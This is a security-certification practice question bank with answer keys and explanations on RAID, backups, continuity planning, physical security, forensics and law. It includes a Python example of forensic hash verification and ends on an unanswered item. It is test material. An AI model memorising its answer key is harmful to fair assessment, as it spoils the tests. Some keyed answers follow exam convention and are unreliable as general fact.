17. How is Hierarchical Storage Management (HSM) best characterized? A. The organization of files and directories on a hard drive B. The method of transporting tapes to off-site locations using armored vehicles and armed personnel C. The process of transitioning files from high-cost, high-speed storage to more affordable, slower storage solutions D. The technique of powering down disk drives to conserve energy, reduce heat, and extend disk lifespan when the stored files are not in use
17. Answer: C. The process of transitioning files from high-cost, high-speed storage to more affordable, slower storage solutions Explanation: Hierarchical Storage Management (HSM) is a data storage technique that automatically moves data between high-cost and low-cost storage media. As data ages and is accessed less frequently, it is moved to slower, more cost-effective storage media. This ensures that critical and frequently accessed data remains on faster storage, while older, less accessed data is moved to cheaper storage.
18. During which stage of a targeted assault would a sniffer tool most likely be initially employed? A. Active reconnaissance B. Passive reconnaissance C. Pillaging D. Fingerprinting
18. Answer: B. Passive reconnaissance Explanation: Passive reconnaissance involves collecting information without directly interacting with the target system. A sniffer, which captures network traffic, is a tool that can be used during this phase to gather valuable information without alerting the target. Active reconnaissance, on the other hand, involves direct interaction with the target, which can raise alarms.
19. What best defines the reason for collusion and the most effective countermeasure against it? A. A comprehensive penetration testing contract B. Implementing separation of duties and rotating job responsibilities C. Addressing software vulnerabilities through consistent OS and application updates D. Employing data redundancy and fault-tolerant technologies
19. Answer: B. Implementing separation of duties and rotating job responsibilities Explanation: Collusion refers to the act of two or more individuals working together to commit fraud or other malicious activities. The best defense against collusion is the separation of duties, ensuring that no single individual has control over all aspects of any critical transaction. Job rotation further reduces the risk by regularly changing individuals’ responsibilities, making it harder for them to collaborate maliciously over an extended period.
20. Upon Nicole’s transfer to a different department and role, why is it essential for an administrator to revoke her previous access rights? A. To mitigate single points of failure B. To prevent sequential access procedures C. To reset the archive attribute D. To counteract privilege accumulation
20. Answer: D. To counteract privilege accumulation Explanation: Privilege accumulation, often referred to as “authorization creep,” occurs when individuals retain old privileges even after changing roles within an organization. Over time, this can lead to users having more access rights than necessary for their current position, increasing the risk of accidental or intentional data misuse. By revoking Nicole’s previous privileges upon her transfer, the organization ensures she only has access to what’s relevant to her new role, maintaining a principle of least privilege.
21. Which statement best captures the essence of Hierarchical Storage Management (HSM)? A. The structure in which files and directories are saved on a hard drive B. The procedure of securely transporting tapes to off-site locations using armored vehicles and security personnel C. The strategy of transitioning files from high speed, high-cost storage to more economical, slower storage media D. The practice of deactivating disk drives to conserve energy, diminish heat, and extend their lifespan when the stored files are not being accessed
21. Answer: C. The strategy of transitioning files from high-speed, high-cost storage to more economical, slower storage media Explanation: Hierarchical Storage Management (HSM) is a data storage technique that moves data between high-cost and low-cost storage media based on its age and access frequency. As data becomes older and is accessed less frequently, it is transferred to slower, more economical storage solutions.
22. When analyzing a suspicious attachment by running it within a controlled virtual setting, how is this environment best described? A. Honeypot B. Hyperjacking C. Sandbox D. Decompiler
22. Answer: C. Sandbox Explanation: A sandbox is a controlled environment where potentially malicious code can be executed safely, without posing a risk to the host system or network. It is isolated from the main system, ensuring that any malicious actions are contained within the sandbox and do not affect the broader environment.
23. Which of the following does not provide a security or operational justification for enforcing mandatory vacations? A. The chance for the organization to review an employee’s work B. Ensuring the employee is rejuvenated C. Preventing a single individual from easily conducting clandestine activities D. Making employees aware that unauthorized actions might be detected
23. Answer: B. Ensuring the employee is rejuvenated Explanation: While ensuring an employee is well-rested is a good general practice for employee well-being, it is not specifically a security or operational reason related to mandatory vacations. The other options relate directly to security and operational benefits.
24. What kind of security measure is represented by an audit trail? A. Application B. Administrative C. Preventative D. Detective
24. Answer: D. Detective Explanation: An audit trail is a record of activities, typically in the context of a computer system, which can be used to detect and investigate unauthorized or anomalous activities. It is a detective control because it helps in identifying issues after they have occurred.
25. Which option does not represent an advantage of RAID (Redundant Array of Independent Disks)? A. Enhanced storage capacity B. Prolonged recovery time C. Performance enhancements D. Fault resilience
25. Answer: B. Prolonged recovery time Explanation: RAID is designed to provide redundancy, improve performance, and increase storage capacity. One of its primary benefits is fault tolerance, which means that if one disk fails, data is not lost. However, prolonged recovery time is not a benefit; in fact, certain RAID configurations aim to reduce recovery time.
27. Which resource is primarily targeted by phreakers? A. Mainframes B. Networks C. PBX systems D. Wireless networks
27. Answer: C. PBX systems Explanation: Phreakers are individuals who manipulate or hack telephone systems, primarily targeting Private Branch Exchange (PBX) systems. Their activities often involve making free long distance calls or gaining unauthorized access to telecommunication systems.
26. Which concept is closely associated with the principle of separation of duties? A. Dual controls B. Principle of least privilege C. Job rotation D. Principle of privilege
26. Answer: A. Dual controls Explanation: Separation of duties and dual controls are both strategies to ensure that no single individual has complete control over all aspects of any critical financial transaction. By requiring two or more individuals to complete a task or transaction, the risk of fraud or error is reduced.
28. After sending an email to an old colleague, it was rejected and you were prompted to resend it. What likely occurred with the message transfer agent? A. Allowlist B. Graylist C. Blocklist D. Black hole
28. Answer: B. Graylist Explanation: Graylisting is an anti-spam technique where the mail server temporarily rejects emails from unknown senders and asks the sending server to resend the message after a certain period. If the email is legitimate, the sending server will attempt to resend it, and it will be accepted on the subsequent attempt.
31. Which backup method is the quickest to perform but requires the most time to restore? A. Incremental B. Differential C. Full D. Grandfathered
31. Answer: A. Incremental Explanation: Incremental backups only save the changes made since the last backup, making them faster to perform. However, during a restore, you would need the last full backup and all subsequent incremental backups, making the restoration process longer compared to other backup methods.
29. In the event of a significant disruption, which of the following is designed to assume operational responsibilities when the primary site is inoperative? A. BCP (business continuity plan) B. Audit C. Incident response D. COOP (continuity of operations plan)
29. Answer: D. COOP (continuity of operations plan) Explanation: A continuity of operations plan (COOP) is designed to ensure that essential functions continue during and after a disaster. It focuses on restoring an organization’s mission-essential functions at an alternate site and performing those functions for up to 30 days before returning to normal operations.
30. Which RAID configuration offers data striping without any redundancy? A. RAID 0 B. RAID 1 C. RAID 3 D. RAID 4
30. Answer: A. RAID 0 Explanation: RAID 0 uses data striping, where data is split into blocks and each block is written to a separate disk drive. It improves performance but offers no redundancy. If one drive fails, all data in the RAID 0 array is lost.
32. Which type of intrusion detection system primarily differentiates between typical and atypical activities? A. Pattern based B. Statistical based C. Traffic based D. Protocol based
32. Answer: B. Statistical based Explanation: A statistical-based intrusion detection system (IDS) monitors network traffic and compares it against an established baseline. The baseline will identify what is considered “normal” behavior. When the IDS detects activity that deviates significantly from the baseline, it will trigger an alert.
33. Which process involves replacing data with zeros? A. Formatting B. Drive wiping C. Zeroization D. Degaussing
33. Answer: C. Zeroization Explanation: Zeroization is the process of erasing sensitive data by overwriting it with zeros. This ensures that the original data is unrecoverable.
34. Which RAID configuration is characterized by a combination of striping and mirroring? A. RAID 1 B. RAID 5 C. RAID 10 D. RAID 15
34. Answer: C. RAID 10 Explanation: RAID 10, also known as RAID 1+0, combines the features of RAID 1 (mirroring) and RAID 0 (striping). It stripes data across mirrored pairs. As a result, it offers both performance improvements (from striping) and redundancy (from mirroring).
35. Which multi-disk technique allows for the utilization of hard drives of varying sizes, provides no speed benefits, does not mirror, and can be implemented on two or more drives? A. RAID 0 B. RAID 1 C. RAID 5 D. JBOD (Just a Bunch of Disks)
35. Answer: D. JBOD (Just a Bunch of Disks) Explanation: JBOD stands for “Just a Bunch of Disks” or “Just a Bunch of Drives.” It is a method of combining multiple hard drives into one logical unit, but without any RAID features like redundancy or performance improvement. Each drive operates independently, and the total storage is the sum of all drives.
36. If you are working on a confidential project that demands an immense amount of computational power, which technique would be most appropriate? A. Redundant servers B. Clustering C. Distributed computing D. Cloud computing
36. Answer: C. Distributed computing Explanation: Distributed computing involves using multiple computers, often spread across vast distances, to work together on a single task. This approach can harness a massive amount of processing power by breaking down a problem into smaller parts and processing them concurrently across multiple machines. It’s particularly useful for tasks that require extensive computational resources.
37. How would you best describe a business continuity/disaster recovery plan? A. A strategy for preventing disasters B. A sanctioned set of preparations and adequate procedures to react to disasters C. A set of actions and methods to respond to disasters without needing managerial consent D. The necessary preparations and methods to ensure the ongoing operation of all organizational functions
37. Answer: B. A sanctioned set of preparations and adequate procedures to react to disasters Explanation: A business continuity/disaster recovery plan is a comprehensive approach that outlines how an organization will continue its operations and recover from unforeseen disasters. It’s not just about preventing disasters but having a structured and approved response when they occur.
38. Which legal and regulatory requirement is universally applicable across all industries? A. Sarbanes-Oxley B. HIPAA C. Due diligence D. BS25999
38. Answer: C. Due diligence Explanation: Due diligence refers to the care that a reasonable person or organization exercises to avoid harm to others or their property. It’s a general principle that applies across industries, ensuring that organizations act responsibly and with caution.
39. Which statement most accurately captures the scope and focus of business continuity or disaster recovery planning within an organization? A. Continuity planning is a paramount organizational concern encompassing all organizational areas or functions. B. Continuity planning primarily focuses on technology, emphasizing the recovery of technological assets. C. Continuity planning is essential only where there’s intricate voice and data communication. D. Continuity planning is a crucial managerial concern, focusing on the main functions as determined by management.
39. Answer: A. Continuity planning is a paramount organizational concern encompassing all organizational areas or functions. Explanation: Business continuity planning should be holistic, addressing all parts of an organization. While technology recovery is essential, other functions like human resources, operations, and supply chain management are equally crucial.
40. The primary objective of a business impact analysis is to A. Determine the effects of a threat on organizational operations B. Identify potential loss exposures for the organization C. Assess the repercussions of a risk on the organization D. Find the most cost-effective method to eliminate threats
40. Answer: A. Determine the effects of a threat on organizational operations Explanation: Business impact analysis (BIA) is conducted to understand the potential effects of disruptions on an organization’s operations. It helps in identifying critical functions and the impact if these functions were to be interrupted.
41. During the risk analysis phase of planning, which action is most effective in managing threats or reducing the consequences of an event? A. Altering the exercise scenario B. Crafting recovery procedures C. Increasing dependence on key personnel D. Instituting procedural controls
41. Answer: D. Instituting procedural controls Explanation: Implementing procedural controls is a proactive approach to manage threats and mitigate the effects of potential events. These controls provide structured guidelines and processes to ensure that risks are minimized and managed effectively.
42. What is the primary reason for introducing additional controls or safeguards? A. To discourage or eliminate the risk B. To detect and remove the threat C. To minimize the threat’s impact D. To recognize the risk and the threat
42. Answer: A. To discourage or eliminate the risk Explanation: The main purpose of implementing controls or safeguards is to deter potential threats or to mitigate the associated risks, ensuring that the organization’s assets and operations remain secure.
43. Which statement most accurately defines a business impact analysis? A. Risk analysis and organizational impact analysis are synonymous terms describing the same project effort. B. A business impact analysis measures the likelihood of disruptions within the organization. C. A business impact analysis is vital for the creation of a business continuity plan. D. A business impact analysis determines the consequences of disruptions on the organization.
43. Answer: D. A business impact analysis determines the consequences of disruptions on the organization. Explanation: Business impact analysis (BIA) is primarily concerned with understanding the potential effects of disruptions on an organization’s operations. It helps in identifying critical functions and the impact if these functions were to be interrupted.
44. The term “disaster recovery” pertains to the restoration of A. Organizational operations B. The technological environment C. The manufacturing environment D. Personnel environments
44. Answer: B. The technological environment Explanation: Disaster recovery primarily focuses on the recovery of IT systems and data after a disaster. It’s a subset of business continuity planning and emphasizes the restoration of IT infrastructure, systems, and data.
45. Which term most accurately describes the effort to understand the potential repercussions of disruptions resulting from a disaster? A. Business impact analysis B. Risk analysis C. Risk assessment D. Project problem definition
45. Answer: A. Business impact analysis Explanation: Business impact analysis (BIA) is the process of determining the potential effects of interruptions to an organization’s operations. It helps organizations understand the potential consequences of various disruptions and prioritize recovery strategies.
46. What is the primary benefit of utilizing a cold site as a recovery strategy? A. It’s a more cost-effective recovery option. B. It can be set up and made operational for any organizational function. C. It’s preconfigured for communications and can be tailored for organizational functions. D. It’s the most readily available option for testing server and communication restorations.
46. Answer: A. It’s a more cost-effective recovery option. Explanation: A cold site is a backup facility that is not immediately ready for use but can be equipped and made operational relatively quickly. Its primary advantage is that it’s typically less expensive than other recovery options, such as hot sites, which are fully equipped and ready for immediate use.
47. Which of the following best describes the components of risk? A. Natural and man-made disasters B. Threats, assets, and controls to mitigate them C. Risk assessment and business impact analysis D. Business impact analysis and controls to mitigate risks
47. Answer: B. Threats, assets, and controls to mitigate them Explanation: Risk is typically understood in terms of potential threats to assets and the controls in place to mitigate those threats. It’s a combination of the likelihood of an event occurring and the potential impact if it does.
48. What does the term “recovery time objective” (RTO) refer to? A. The maximum duration a service or system can be down B. The duration a disaster recovery process should take C. The time needed to transition from a primary to a backup site D. The waiting period before initiating a crisis communication plan
48. Answer: A. The maximum duration a service or system can be down Explanation: RTO, or recovery time objective, refers to the target time within which a business process or IT system must be restored after a disruption to avoid unacceptable consequences.
51. Which method is not recommended for testing the business continuity plan? A. Tabletop exercise B. Call exercise C. Simulated exercise D. Interrupting a live production application or function
51. Answer: D. Interrupting a live production application or function Explanation: Halting a live production application or function can have real-world consequences and is not a recommended method for testing a business continuity plan. The other options are controlled exercises designed to test various aspects of the plan without causing disruptions.
49. Which backup type allows for the most efficient restoration from tape backup? A. Full backup B. Incremental backup C. Partial backup D. Differential backup
49. Answer: A. Full backup Explanation: A full backup captures all the data in an entire system or subsystem. When restoring from a full backup, all the data can be retrieved in one operation, making it the most efficient restore method.
52. What is the main objective of a well-structured business continuity exercise? A. To pinpoint the strengths and weaknesses of the plan B. To meet managerial requirements C. To adhere to an auditor’s stipulations D. To sustain shareholder trust
52. Answer: A. To pinpoint the strengths and weaknesses of the plan Explanation: The primary goal of a business continuity exercise is to test the plan in a controlled environment, allowing the organization to identify areas where the plan excels and areas that need improvement.
50. What is a primary advantage of a hot site recovery solution? A. It’s more cost-effective. B. It’s highly available. C. It ensures zero downtime D. It requires no maintenance.
50. Answer: B. It’s highly available. Explanation: A hot site is a fully equipped data center that can take over operations almost immediately after a disaster. Its primary advantage is its high availability, ensuring minimal disruption to operations.
56. If a service’s recovery point objective is zero, which strategy is best to ensure this requirement is met? A. RAID 6 with a hot site alternative B. RAID 0 with a warm site alternative C. RAID 0 with a cold site alternative D. RAID 6 with a reciprocal agreement
56. Answer: A. RAID 6 with a hot site alternative Explanation: A recovery point objective (RPO) of zero means no data loss is acceptable. RAID 6 provides fault tolerance and can handle two simultaneous drive failures. Paired with a hot site, which is a fully equipped data center ready for immediate use, this combination ensures both data integrity and rapid recovery. RAID 0, on the other hand, offers no redundancy and is not suitable for scenarios where data loss is unacceptable.
53. When is the optimal time to update and maintain a business continuity plan? A. Yearly or upon an auditor’s request B. Only when new software versions are rolled out C. Exclusively when new hardware is introduced D. As part of the configuration and change management procedure
53. Answer: D. As part of the configuration and change management procedure Explanation: Business continuity plans should be updated regularly to reflect changes in the organization’s environment, operations, or risk profile. Integrating updates into the configuration and change management process ensures that the plan remains current and relevant.
54. Which factor is paramount for the success of business continuity? A. Support from senior leadership B. A competent technical support team C. A comprehensive Wide Area Network infrastructure D. A cohesive incident response team
54. Answer: A. Support from senior leadership Explanation: While all the options are important, the support and commitment of senior leadership are crucial for the success of business continuity. Their support ensures that the necessary resources are allocated, and it emphasizes the importance of continuity planning throughout the organization.
55. If the recovery time objective for a service is two months, which alternate site strategy is most suitable? A. Cold site B. Reciprocal agreement C. Warm site D. Hot site
55. Answer: A. Cold site Explanation: A cold site is a backup facility that is not immediately ready for use but can be equipped and made operational within a certain time frame. Given a recovery time objective of two months, a cold site would be the most cost-effective and suitable option.
57. What is the main role of a physical protection system? A. Ascertain, guide, and dispatch B. Detect, delay, and respond C. Display, develop, initiate, and capture D. Evaluate, dispatch, and detain
57. Answer: B. Detect, delay, and respond Explanation: The primary function of a physical protection system is to detect any unauthorized activities or intrusions, delay the intruder’s progress, and respond to the situation, either by alerting security personnel or initiating other security measures.
58. For a successful vulnerability assessment, understanding protection systems is crucial through which of the following? A. Threat definition, target identification, and facility characterization B. Threat definition, conflict control, and facility characterization C. Risk assessment, threat identification, and incident review D. Threat identification, vulnerability evaluation, and access review
58. Answer: A. Threat definition, target identification, and facility characterization Explanation: A comprehensive vulnerability assessment requires understanding the potential threats, identifying potential targets, and characterizing the facility’s features and vulnerabilities.
60. What is the strategy called that involves creating multiple layers of protection around a resource or facility? A. Secured boundary B. Defense in depth C. Strengthened barrier deterrent D. Reasonable asset defense
60. Answer: B. Defense in depth Explanation: Defense in depth is a security strategy that employs multiple layers of defense to protect assets. This approach ensures that if one layer is breached, additional layers remain to provide protection.
59. In which scenarios is laminated glass recommended? A. All external glass windows B. Interior boundary breaches and vital infrastructure facilities C. Windows at street level, entrances, and other access points D. Capacitance proximity, intrusion detection locations, and boundary breaches
59. Answer: C. Windows at street level, entrances, and other access points Explanation: Laminated glass is designed to remain intact even when shattered, making it ideal for areas vulnerable to break-ins or accidental damage, such as street-level windows and doorways.
61. Which technique is most effective in shaping a physical environment to positively impact human behavior and reduce crime? A. Asset protection and vulnerability evaluations B. Minimizing vulnerability by safeguarding, compensating, or transferring the risk C. Crime prevention through environmental design D. Implementing employee screening and programs against workplace violence
61. Answer: C. Crime prevention through environmental design Explanation: Crime prevention through environmental design (CPTED) is a multidisciplinary approach to deterring criminal behavior through environmental design. It focuses on designing a physical environment that positively influences human behavior, making spaces less conducive to crime and more conducive to positive social interaction.
64. What is the recommended lighting level for safety in perimeter zones like parking areas or garages? A. 3 fc B. 5 fc C. 7 fc D. 10 fc
64. Answer: B. 5 fc Explanation: Adequate lighting is essential for safety in perimeter areas. A level of 5 foot-candles (fc) is commonly recommended for such zones to ensure visibility and deter potential threats.
62. What is the cornerstone of an effective physical protection system? A. Integration of individuals, processes, and equipment B. Combination of technology, risk evaluation, and human engagement C. Safeguarding, compensating, and risk transfer D. Detection, prevention, and reaction
62. Answer: A. Integration of individuals, processes, and equipment Explanation: An effective physical protection system relies on the harmonious integration of people (who operate and respond to the system), procedures (the guidelines and protocols in place), and equipment (the physical and technological tools used).
63. What is the main goal of regulating access to a facility or zone? A. Manage time controls for all staff members B. Ensure only authorized individuals gain entry C. Prevent potential threats or unauthorized materials that could be used for sabotage D. For identification purposes
63. Answer: B. Ensure only authorized individuals gain entry Explanation: The primary purpose of access control is to ensure that only those with the appropriate permissions or credentials can enter a specific area or facility, thereby maintaining security.
65. Which interior sensor is most suitable for a structure with ground-floor windows? A. Infrared glass-break sensor B. Ultrasonic glass-break sensors C. Acoustic/shock glass-break sensors D. Volumetric sensors
65. Answer: C. Acoustic/shock glass-break sensors Explanation: Acoustic or shock glass-break sensors detect the specific frequencies or vibrations associated with breaking glass, making them ideal for buildings with accessible windows.
66. Which options accurately represent three distinct functions of CCTV? A. Monitoring, deterrence, and evidence collection B. Intrusion detection, containment, and response C. Optical scanning, infrared projection, and illumination D. Observation, white balancing, and inspection
66. Answer: A. Monitoring, deterrence, and evidence collection Explanation: CCTV systems primarily serve to monitor areas, act as a deterrent to potential intruders or malicious actors, and provide evidence in case of incidents.
67. While security technologies aren’t a panacea for all organizational security challenges, what benefit do they offer when applied correctly? A. Reduction in electricity expenses B. Enhancement of the security framework, often leading to cost savings for the organization C. Government tax breaks for improved physical security systems D. Increased property value due to advanced integrated technologies
67. Answer: B. Enhancement of the security framework, often leading to cost savings for the organization Explanation: When security technologies are appropriately implemented, they can bolster the organization’s security measures. This not only enhances protection but can also lead to operational efficiencies and cost savings in the long run.
68. For what primary reason should a comprehensive evaluation of a facility or structure be conducted? A. To identify the locations of all fire exits B. In relation to the specified threats and the worth of the organization’s assets C. To tally the number of staff members inside the facility D. To assess the robustness of the boundary walls
68. Answer: B. In relation to the specified threats and the worth of the organization’s assets Explanation: A meaningful assessment of a facility should be conducted to understand the potential threats against it and to evaluate the security measures in place relative to the value of the assets it houses.
69. Which of the following is the optimal example of designing a new facility with security in mind? A. Minimizing the number of entrances that need monitoring, staffing, and protection B. Cutting down costs related to energy consumption for the physical security system C. Providing employees with easy access without them being aware of the security measures monitoring them D. Applying blast-resistant film to all external windows
69. Answer: A. Minimizing the number of entrances that need monitoring, staffing, and protection Explanation: When designing a facility with security as a priority, it’s crucial to limit potential vulnerabilities. By reducing the number of entrances, the facility can more effectively monitor, staff, and secure those points of entry.
70. Why is it an established protocol for all visitors to sign in and out using a visitor’s log when entering a facility? A. For detection, responsibility, and the potential need for action B. For access control and observation C. To record the duration of the visit, the person visited, and to account for everyone in emergencies D. For planning evaluation and proper designation requirements
70. Answer: C. To record the duration of the visit, the person visited, and to account for everyone in emergencies Explanation: A visitor’s log serves multiple purposes, but its primary function is to maintain a record of individuals entering and exiting the facility. This ensures that in case of emergencies, there’s an accurate account of everyone present, enhancing safety and accountability.
71. What is the most effective method to safeguard the physical components linked to the alarm system? A. Tamper protection B. Target fortification C. Security design D. UL 2050 standard
71. Answer: A. Tamper protection Explanation: Tamper protection mechanisms are designed to prevent unauthorized access or interference with the physical components of an alarm system. If someone tries to tamper with the system, an alert is typically triggered, ensuring the system’s integrity and reliability.
72. When utilizing portable computing devices or media, either within a facility or outside for legitimate business reasons, which protective measures are BEST to ensure their security? A. Cable locks, encryption, password safeguards, and heightened awareness B. Mitigating vulnerability through protection, risk offset, or risk transfer C. Operational readiness, physical security systems, and standard operating procedures D. Enhancing awareness, environmental design, and physical security measures
72. Answer: A. Cable locks, encryption, password safeguards, and heightened awareness Explanation: Portable devices are vulnerable to theft or unauthorized access. Employing physical measures like cable locks, combined with digital security measures like encryption and password protection, and fostering a heightened awareness among users are the best practices to ensure their security.
73. Which systems authenticate individuals based on unique physical characteristics like fingerprints, eye patterns, or voice? A. Biometric devices B. Technological systems C. Physiometric devices D. Physical analysis devices
73. Answer: A. Biometric devices Explanation: Biometric devices authenticate individuals based on their unique physical or behavioral characteristics. These can include fingerprints, retina or iris patterns, voice recognition, and facial recognition, among others.
74. Physical security is implemented using what kind of approach with protective measures to deter unauthorized access or property damage? A. Layers B. Methods C. Varieties D. Types
74. Answer: A. Layers Explanation: The layered approach to physical security ensures that multiple levels of protection are in place. If one layer is breached, additional layers remain to provide protection, making it more challenging for unauthorized individuals to gain access or cause damage.
75. What term describes a thorough review of a facility, encompassing physical security controls, policies, procedures, and employee safety? A. Availability assessment B. Security survey C. Budgetary and financial review D. Defense in depth
75. Answer: B. Security survey Explanation: A security survey provides a comprehensive overview of a facility’s security posture. It evaluates physical security controls, policies, procedures, and ensures the safety of employees, identifying potential vulnerabilities and areas for improvement.
76. Which security measure is most effective in preventing unauthorized access methods like “piggybacking” or “tailgating”? A. Cameras B. Turnstiles C. Keys D. Identification badges
76. Answer: B. Turnstiles Explanation: Turnstiles are physical barriers that allow only one person to pass at a time, making it difficult for someone to “piggyback” or “tailgate” behind an authorized individual. They are especially effective in high-security areas or entrances where strict access control is required.
77. From which source does the most significant threat of cybercrime originate? A. External actors B. State-sponsored actors C. Internal actors or employees D. Novice hackers or enthusiasts
77. Answer: C. Internal actors or employees Explanation: While all the listed entities pose threats, insiders often have direct access to an organization’s systems and data, making them a significant risk. They might exploit their access for malicious purposes, either intentionally or inadvertently.
78. What is the primary obstacle in combating computer related crimes? A. Cybercriminals tend to be more intelligent than cyber investigators. B. Insufficient funds to stay ahead of cybercriminals. C. The global nature of computer crime activities. D. The overwhelming number of cybercriminals compared to investigators.
78. Answer: C. The global nature of computer crime activities Explanation: Computer crime often transcends borders, making jurisdiction and international cooperation challenging. While all the options present challenges, the international nature of cybercrime complicates investigations, prosecution, and prevention.
79. Computer forensics combines computer science, IT, and engineering with which of the following? A. Legal principles B. Information systems C. Analytical reasoning D. Scientific methodology
79. Answer: A. Legal principles Explanation: Computer forensics involves the collection, analysis, and preservation of digital evidence in a manner that is legally admissible in a court of law. Thus, it marries technical expertise with legal principles.
80. Which principle suggests that a criminal always leaves behind evidence while also taking something from the crime scene? A. Meyer’s principle of legal non-liability B. Principles of criminalistics C. IOCE/Group of 8 Nations principles for computer forensics D. Locard’s exchange principle
80. Answer: D. Locard’s exchange principle Explanation: Dr. Edmond Locard posited that every contact leaves a trace. This means that criminals will always leave some evidence behind at a crime scene and simultaneously take something with them.
83. Which legal system primarily focuses on theoretical legal concepts and is influenced by academic writings and scholars? A. Criminal law B. Civil law C. Theocratic law D. Regulatory law
83. Answer: B. Civil law Explanation: Civil law, also known as code-based or codified law, is based on comprehensive statutes and codes that emphasize abstract legal principles. It is influenced by legal scholars and is distinct from common law systems.
81. Which combination correctly represents the essential rules of evidence? A. Be genuine, be duplicated, and be permissible in court. B. Be exhaustive, be genuine, and be permissible in court. C. Be exhaustive, be duplicated, and be genuine. D. Be duplicated, be permissible in court, and be exhaustive.
81. Answer: B. Be exhaustive, be genuine, and be permissible in court. Explanation: For evidence to be effective in a legal setting, it must be complete (covering all aspects of the matter), authentic (verifiable and genuine), and admissible (acceptable in a court of law).
82. Which of the following is not typically considered a stage in the incident response process? A. Recordkeeping B. Legal action C. Isolation D. Examination
82. Answer: B. Legal action Explanation: While prosecution might be an outcome or follow-up to an incident response, it is not typically considered a phase of the incident response process itself. The primary stages often include preparation, identification, containment, eradication, recovery, and lessons learned/documentation.
85. Which intellectual property right safeguards the reputation and brand recognition a business establishes for its products? A. Brand mark B. Invention protection C. Literary and artistic works protection D. Business confidential information
85. Answer: A. Brand mark (trademark) Explanation: Trademarks protect symbols, names, and slogans used to identify goods or services. They safeguard the goodwill and brand recognition a company has built.
84. Which form of intellectual property protection covers the representation of ideas, rather than the ideas themselves? A. Brand mark B. Invention protection C. Literary and artistic works protection D. Business confidential information
84. Answer: C. Literary and artistic works protection (copyright) Explanation: Copyrights protect the expression of ideas, such as writings, music, and art. They do not protect the underlying ideas themselves.
86. Which combinations represent recognized guidelines in the field of computer forensics? A. IOCE, Method of Operation (MOM), and SWGDE B. Method of Operation (MOM), SWGDE, and IOCE C. IOCE, SWGDE, and ACPO D. ACPO, Method of Operation (MOM), and IOCE
86. Answer: C. IOCE, SWGDE, and ACPO Explanation: IOCE (International Organization on Computer Evidence), SWGDE (Scientific Working Group on Digital Evidence), and ACPO (Association of Chief Police Officers) are all recognized entities that provide guidelines and best practices in the field of computer forensics.
87. Which of the following options lists types of software licenses? A. No-cost software, open source, and paid software B. Paid software, educational, and open source C. Educational, no-cost software, and open source D. No-cost software, paid software, and educational
87. Answer: A. No-cost software, open source, and paid software (freeware, open source, and commercial) Explanation: Freeware is software that is available at no cost. Open source software is software for which the original source code is made freely available and may be redistributed and modified. Commercial software is sold for profit.
88. Which term best describes the rights and responsibilities related to the handling of personal data? A. Personal rights B. Confidentiality C. Data accessibility D. Data trustworthiness
88. Answer: A. Personal rights (privacy) Explanation: Privacy pertains to the rights and obligations of individuals and organizations concerning the collection, use, retention, and disclosure of personal information.
89. Which of the following best describes the initial stages of responding to an incident? A. Gathering, moving, testifying B. Tracing, replying, returning C. Spotting, recognizing, alerting D. Securing, ensuring, providing
89. Answer: C. Spotting, recognizing, alerting (detection, identification, notification) Explanation: Triage in incident response typically involves detecting the incident, identifying its nature, and notifying relevant stakeholders.
90. How can the authenticity of a forensic digital copy be verified? A. By comparing digital signatures with the original B. Through meticulous recordkeeping C. By photographing the process D. Using cryptographic keys
90. Answer: A. By comparing digital signatures with the original (in practice, by comparing cryptographic hash values of the copy with those of the original source) Explanation: A forensic image is verified by hashing the source medium at acquisition time, hashing the resulting image, and comparing the two values; if they match, the copy is a bit-for-bit replica, and both values are written into the chain-of-custody record so the image can be re-verified later. Use a collision-resistant algorithm such as SHA-256; MD5 and SHA-1 are no longer collision-resistant, although imaging tools still record them alongside SHA-256 for compatibility with older exhibits. Strictly speaking a hash is not a digital signature (a signature additionally binds the hash to a signer’s private key), which is why the wording of option A is loose.
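The verification just described, as an added worked example that is not part of the original question bank: hash the source and the acquired image in one streaming pass, compare every digest, and re-check an image against a digest recorded in the chain-of-custody record. The byte strings standing in for the source drive and the three images are constructed for the example, and the function names are the example’s own, not those of any imaging tool.

```python
import hashlib
from typing import Dict, Iterator, Tuple

# Record more than one digest: SHA-256 for collision resistance, MD5 and SHA-1 because
# older tooling and existing court exhibits often list them. Never rely on MD5 alone.
ALGORITHMS = ("md5", "sha1", "sha256")
CHUNK_SIZE = 4096  # hash block by block so a multi-terabyte image never has to fit in memory


def iter_chunks(data: bytes, size: int = CHUNK_SIZE) -> Iterator[bytes]:
    """Stand-in for reading a device or image file block by block."""
    for offset in range(0, len(data), size):
        yield data[offset:offset + size]


def hash_stream(data: bytes, size: int = CHUNK_SIZE) -> Dict[str, str]:
    """Compute every configured digest in a single pass over the data."""
    hashers = {name: hashlib.new(name) for name in ALGORITHMS}
    for chunk in iter_chunks(data, size):
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def verify_image(source: bytes, image: bytes) -> Tuple[bool, Dict[str, str], Dict[str, str]]:
    """Acquisition-time check: hash the source, hash the copy, compare all digests.
    A single altered byte or a truncated copy fails the comparison."""
    source_digests = hash_stream(source)
    image_digests = hash_stream(image)
    identical = all(source_digests[a] == image_digests[a] for a in ALGORITHMS)
    return identical, source_digests, image_digests


def verify_against_record(image: bytes, recorded_sha256: str) -> bool:
    """Later re-verification against the SHA-256 written in the chain-of-custody
    record (e.g. before analysis or before presenting the image in court)."""
    return hash_stream(image)["sha256"].lower() == recorded_sha256.strip().lower()


# Constructed stand-ins for a source drive and three acquired images (not real evidence).
SOURCE_DRIVE = bytes(range(256)) * 64                                  # 16 KiB of predictable content
GOOD_IMAGE = bytes(SOURCE_DRIVE)                                        # bit-for-bit copy
TAMPERED_IMAGE = SOURCE_DRIVE[:5000] + b"\x00" + SOURCE_DRIVE[5001:]    # one byte altered, same length
TRUNCATED_IMAGE = SOURCE_DRIVE[:-1]                                     # last byte lost

if __name__ == "__main__":
    for label, img in (("good", GOOD_IMAGE), ("tampered", TAMPERED_IMAGE), ("truncated", TRUNCATED_IMAGE)):
        ok, _, got = verify_image(SOURCE_DRIVE, img)
        print(f"{label:9s} match={ok} sha256={got['sha256']}")
```

Note that the tampered image has exactly the same length as the source, so a size comparison alone would pass it; only the digest comparison catches it. On hosts running in FIPS mode, `hashlib.new("md5")` may be disabled, in which case drop MD5 from `ALGORITHMS` rather than weakening the check.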
91. Regarding digital evidence, the crime scene should A. Remain untouched B. Be able to be duplicated in court C. Be located in a single jurisdiction D. Have minimal interference
